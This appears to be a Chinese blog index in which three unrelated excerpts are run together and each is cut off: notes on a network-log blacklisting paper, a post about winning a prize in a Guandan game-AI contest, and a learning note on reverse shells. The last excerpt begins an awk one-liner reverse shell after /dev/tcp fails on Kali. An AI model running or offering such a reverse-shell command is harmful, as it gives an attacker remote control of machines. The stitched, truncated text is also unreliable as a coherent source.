最近在研究通过网络日志来检测网络攻击，在这里记录下读过的相关文章，文章来源主要是ACM Digital LibraryHighly Predictive Blacklisting1.文章里主要介绍了一种设置网络黑名单的方法2.首先需要对日志进行一些过滤，如先筛去无效ip产生的日志，对常见的网站爬虫设置白名单， 同时排除了源端口为53 (DNS), 25 (SMTP), 80 (HTTP),443

首先感谢主板方，虽然只是拿了个优胜奖，但是也有5000块奖金，吃的住的都很好！！大赛官网：https://www.bagevent.com/event/6808642参赛选手作品代码：http://gameai.njupt.edu.cn/gameaicompetition/guandan_machine_code/index.html因为代码很多而且较复杂，就不放上来了，虽然说是人工智能，但是大家

在学习反弹shell的相关知识时，尝试在kali2上使用反弹shell提示没有/dev/tcp 这是怎么回事呢？我百度了一下，大部分的说法是这个目录是bash创建的一个虚拟目录，但还是没有解决问题，最后在谷歌上找到了解释https://evilpan.com/2021/04/25/reverse-shell/因此还是使用awk命令一句话反弹shellawk 'BEGIN {s = "/inet/t